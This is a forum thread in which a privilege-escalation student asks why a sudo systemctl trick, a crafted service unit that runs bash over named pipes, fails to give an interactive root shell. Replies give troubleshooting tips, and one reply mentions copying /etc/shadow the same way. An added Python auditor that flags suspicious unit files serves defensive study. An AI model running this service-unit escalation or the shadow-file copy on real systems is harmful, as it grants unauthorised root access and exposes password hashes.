Hey everyone! I'm diving into a Linux privilege escalation course and stumbled across some interesting stuff about systemctl abuse. I'm curious about why I can't get an interactive shell using named pipes with systemctl, while it seems to work fine without it. Here's what I've tried:
```bash
f1=/tmp/infifo
f2=/tmp/outfifo
mkfifo $f1 $f2
sf=`mktemp`.service
echo -e "[Service]\nExecStart=eval \"/bin/bash $f2 &\"\n[Install]\nWantedBy=multi-user.target" > $sf
sudo systemctl link $sf
sudo systemctl enable $sf --now
cat $f2 &
cat > $f1
```
The command didn't work for me, but when I run bash with the pipes without using systemctl, it works perfectly. Am I messing up the pipes logic somewhere? Any insights on how to properly use named pipes would be greatly appreciated!
3 Answers
It sounds like you're on the right track with trying to leverage systemctl for this kind of interaction, but remember that it may require specific privileges. Systemd commands and their path requirements can get a bit convoluted, so it’s worth double-checking that!
The problem is likely due to the way systemd handles execution. When you specify commands in ExecStart, it expects a complete executable path, and `eval` is a shell command, not an executable. You might want to create a script that wraps your bash command and call that instead!
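Added example, not part of the original thread: a small unit-file audit in Python that a defender could run over unit files to flag an `Exec*` line that starts with a shell builtin or relies on shell operators (systemd starts the program directly and runs no shell), and a unit file stored in a world-writable directory. The builtin list, the directory list and the sample unit are assumptions constructed for illustration.

```python
import shlex

# Assumption: small, non-exhaustive set of shell builtins with no binary on disk.
SHELL_BUILTINS = {"eval", "exec", "export", "set", "source"}
# Assumption: directories where any local user can usually create files.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def audit_unit(unit_path, unit_text):
    """Return findings for one unit file, given its path and contents."""
    findings = []
    if unit_path.startswith(WRITABLE_DIRS):
        findings.append("unit file is stored in a world-writable directory")
    section = None
    for raw in unit_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        key = key.strip()
        if section != "Service" or not sep or not key.startswith("Exec"):
            continue
        try:
            # posix=False keeps quote characters, so quoted text stays one token.
            argv = shlex.split(value, posix=False)
        except ValueError:
            findings.append(f"{key}: unbalanced quoting")
            continue
        if not argv:
            continue
        # Drop the special prefixes systemd allows before the executable.
        prog = argv[0].lstrip("@-:+!").strip("\"'")
        if prog in SHELL_BUILTINS:
            findings.append(f"{key}: '{prog}' is a shell builtin, not an executable")
        elif "/" in prog and not prog.startswith("/"):
            findings.append(f"{key}: '{prog}' is a relative path")
        # systemd.service(5): <, <<, >, >>, | and & are not supported in Exec* lines.
        ops = [t for t in argv[1:] if t[0] in "<>|&"]
        if ops:
            findings.append(f"{key}: shell operators not interpreted: {' '.join(ops)}")
    return findings


# Constructed sample modelled on the unit file in the question, with $f2 expanded.
SAMPLE_PATH = "/tmp/tmp.EXAMPLE.service"
SAMPLE_UNIT = '[Service]\nExecStart=eval "/bin/bash /tmp/outfifo &"\n[Install]\nWantedBy=multi-user.target\n'

if __name__ == "__main__":
    for finding in audit_unit(SAMPLE_PATH, SAMPLE_UNIT):
        print(finding)
```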
It looks like you might want to check out the details on the systemctl page you linked. When using sudo with systemctl, the command usually needs to be run by a user with elevated privileges right from the start. It’s important to note that some commands require you to have those privileges initially, or they won't execute as you expect. You could always try running it under a user with proper permissions to see if that changes anything!
Good point! But if you're facing restrictions with named pipes, it's worth checking how your user permissions are set up. It's a bit tricky when trying to mix user restrictions and named pipes.
I get that, but I've seen similar commands work with a simple eval like `cp /etc/shadow /tmp/shadow`. My issue is that with named pipes, it seems like nothing's happening when I input commands. What could be the issue with the pipes in this scenario?